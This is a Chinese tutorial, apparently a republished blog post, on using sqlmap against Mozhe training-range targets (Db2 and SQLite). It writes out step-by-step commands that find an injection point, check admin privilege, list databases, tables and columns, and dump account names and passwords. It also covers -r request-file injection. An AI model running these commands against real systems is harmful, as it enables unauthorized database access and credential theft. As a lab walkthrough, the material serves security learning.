WEB攻防-通用漏洞SQL注入-sqlmap基本使用墨者靶场

本文主要是介绍WEB攻防-通用漏洞SQL注入-sqlmap基本使用墨者靶场,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

知识点

SQLMAP

-什么是SQLMAP?

-它支持那些数据库注入?

-它支持那些SQL注入模式?

-它支持那些其他不一样功能?

-使用SQLMAP一般注入流程分析?

SQL注入类型:

案例演示

SQL注入-墨者-SQL手工注入漏洞测试(Db2数据库)

 SQL注入-墨者-SQL手工注入漏洞测试(SQLite数据库)

其他注入方法介绍

sqlmap -r


知识点

1、数据库注入-Oracle&Mongodb

2、数据库注入-DB2&SQLite&Sybase

3、SQL注入神器-SQLMAP安装使用拓展

SQLMAP

-什么是SQLMAP?

sqlmap是一个开源渗透测试工具,可以自动检测和利用sql注入漏洞并接管数据服务器。总体来说只要配备sql的漏洞都可以使用sqlmap。

-它支持那些数据库注入?

不支持nosql数据库

-它支持那些SQL注入模式?

基于布尔的盲注、基于时间的盲注、基于错误的、基于union查询、堆叠查询和带外

-它支持那些其他不一样功能?

代理注入:在注入的时候,代理可以让我们随时看到sqlmap的进度。当地址被waf拉入黑名单可以使用代理绕过waf。

-使用SQLMAP一般注入流程分析?

判断注入点-判断数据库-判断高低权限(access不区分高低权限)-通过权限的不同使用不同的方法

SQL注入类型:

1.数据库注入 - access mysql mssql oracle mongodb postgresql等

2.数据类型注入 - 数字型 字符型 搜索型 加密型(base64 json)等

3.提交方式注入 - get post cookie http头等

4.查询方式注入 - 查询 增加 删除 更新 堆叠等

5.复杂注入利用 - 二次注入 dnslog注入 绕过bypass等

案例演示

SQL注入-墨者-SQL手工注入漏洞测试(Db2数据库)

启动靶机

发现注入点

sqlmap语句: python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1"

代码解释:利用python去调用sqlmap下的.py文件,-u代表指定的路径

 接下来会告诉我们已经猜测是IBM DB2数据库,是否跳过其他数据库的检测。对于其测试的要包含的扩展级别。全部直接y就好。

 当看到的是以下的这个界面,那么就可以证明是存在注入点的,并且在末尾告诉了数据库的类型

 查询权限

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --is-dba 或者 python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --privileges

代码解释:--is-dba代表查看权限        --privileges代表是否是数据库管理员

查看显示的数据为True,那么证明是管理员用户

sqlmap 数据库注入数据猜解

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --dbs

代码解释:--dbs代表获取数据库

通过显示数据可以发现一共有13个数据库

 

获取数据库

sqlmap语句:\python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --current-db

代码解释:--current-db是获取当前数据库

现在知道了数据库名为DB2INST1

获取表名

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --tables -D "DB2INST1"

代码解释:--tables代表获取表名 -D代表指定某个数据库    如果不加-D将获取所有数据库的表名

目前知道了 数据库名DB2INST1  表名 GAME_CHARACTER   NOTICE

 

获取列名

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --columns -T "NOTICE" -D "DB2INST1"

代码解释:--columns代表获取列名  -T代表指定表名

目前已知信息为:数据库名DB2INST1  表名 GAME_CHARACTER   NOTICE 

 

获取信息

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --dump -C "name" -T "GAME_CHARACTER" -D "DB2INST1"  和  python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --dump -C "password" -T "GAME_CHARACTER" -D "DB2INST1"

代码解释:--dump代表获取内容        -C代表获取指定内容

这里小编因为知道账号密码在哪个表中直接获取,在实战中时代价需要一个个表测试。

  

  

这里给各位简单说一下,下面的路径是每次测试完,数据自动存放的路径。可以打开直接查看

 SQL注入-墨者-SQL手工注入漏洞测试(SQLite数据库)

启动靶机---本次实验与上面实验代码相似,所以不在提供代码

发现注入点,这里使用了--purge,代表清除上一个缓存。获取了数据库名为SQLite,也可以知道是Linux Ubuntu系统,中间件为Nginx

判断是否为管理员,返回为true,代表是管理员

 

查询所有数据库,返回值user only ‘--tables’代表只有表没有数据库

查询表,得知了表名为WSTMart_reg  notice_sybase  sqlite_sequence

 

获取列名,因为小编知道账号密码在WSTMart_reg下,真实环境中需要不断猜测尝试

 

 获取账号密码,存在一些小细节,在图片中给各位解释了一下

 

 

其他注入方法介绍

sqlmap -r

sqlmap -r 指定文件

-r代表跑指定文件,在文件需要注入的地方添加*号即可

使用场景:利用sqlmap去跑某个特性的数据包。比如注入点产生在用户登陆后的地方,那么就需要把登陆后的数据包进行保存并利用sqlmap去跑,这样sqlmap才知道需要去对登陆后的页面进行注入,否则直接利用网址sqlmap也不会知道需要登陆就无法找到注入点。

 

 

 

 

 

这篇关于WEB攻防-通用漏洞SQL注入-sqlmap基本使用墨者靶场的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/422396

相关文章

SQL BETWEEN 语句的基本用法详解

《SQLBETWEEN语句的基本用法详解》SQLBETWEEN语句是一个用于在SQL查询中指定查询条件的重要工具,它允许用户指定一个范围,用于筛选符合特定条件的记录,本文将详细介绍BETWEEN语... 目录概述BETWEEN 语句的基本用法BETWEEN 语句的示例示例 1:查询年龄在 20 到 30 岁

MySQL DQL从入门到精通

《MySQLDQL从入门到精通》通过DQL,我们可以从数据库中检索出所需的数据,进行各种复杂的数据分析和处理,本文将深入探讨MySQLDQL的各个方面,帮助你全面掌握这一重要技能,感兴趣的朋友跟随小... 目录一、DQL 基础:SELECT 语句入门二、数据过滤:WHERE 子句的使用三、结果排序:ORDE

python使用库爬取m3u8文件的示例

《python使用库爬取m3u8文件的示例》本文主要介绍了python使用库爬取m3u8文件的示例,可以使用requests、m3u8、ffmpeg等库,实现获取、解析、下载视频片段并合并等步骤,具有... 目录一、准备工作二、获取m3u8文件内容三、解析m3u8文件四、下载视频片段五、合并视频片段六、错误

gitlab安装及邮箱配置和常用使用方式

《gitlab安装及邮箱配置和常用使用方式》:本文主要介绍gitlab安装及邮箱配置和常用使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1.安装GitLab2.配置GitLab邮件服务3.GitLab的账号注册邮箱验证及其分组4.gitlab分支和标签的

SpringBoot3应用中集成和使用Spring Retry的实践记录

《SpringBoot3应用中集成和使用SpringRetry的实践记录》SpringRetry为SpringBoot3提供重试机制,支持注解和编程式两种方式,可配置重试策略与监听器,适用于临时性故... 目录1. 简介2. 环境准备3. 使用方式3.1 注解方式 基础使用自定义重试策略失败恢复机制注意事项

MySQL MCP 服务器安装配置最佳实践

《MySQLMCP服务器安装配置最佳实践》本文介绍MySQLMCP服务器的安装配置方法,本文结合实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下... 目录mysql MCP 服务器安装配置指南简介功能特点安装方法数据库配置使用MCP Inspector进行调试开发指

nginx启动命令和默认配置文件的使用

《nginx启动命令和默认配置文件的使用》:本文主要介绍nginx启动命令和默认配置文件的使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录常见命令nginx.conf配置文件location匹配规则图片服务器总结常见命令# 默认配置文件启动./nginx

在Windows上使用qemu安装ubuntu24.04服务器的详细指南

《在Windows上使用qemu安装ubuntu24.04服务器的详细指南》本文介绍了在Windows上使用QEMU安装Ubuntu24.04的全流程:安装QEMU、准备ISO镜像、创建虚拟磁盘、配置... 目录1. 安装QEMU环境2. 准备Ubuntu 24.04镜像3. 启动QEMU安装Ubuntu4

mysql中insert into的基本用法和一些示例

《mysql中insertinto的基本用法和一些示例》INSERTINTO用于向MySQL表插入新行,支持单行/多行及部分列插入,下面给大家介绍mysql中insertinto的基本用法和一些示例... 目录基本语法插入单行数据插入多行数据插入部分列的数据插入默认值注意事项在mysql中,INSERT I

使用Python和OpenCV库实现实时颜色识别系统

《使用Python和OpenCV库实现实时颜色识别系统》:本文主要介绍使用Python和OpenCV库实现的实时颜色识别系统,这个系统能够通过摄像头捕捉视频流,并在视频中指定区域内识别主要颜色(红... 目录一、引言二、系统概述三、代码解析1. 导入库2. 颜色识别函数3. 主程序循环四、HSV色彩空间详解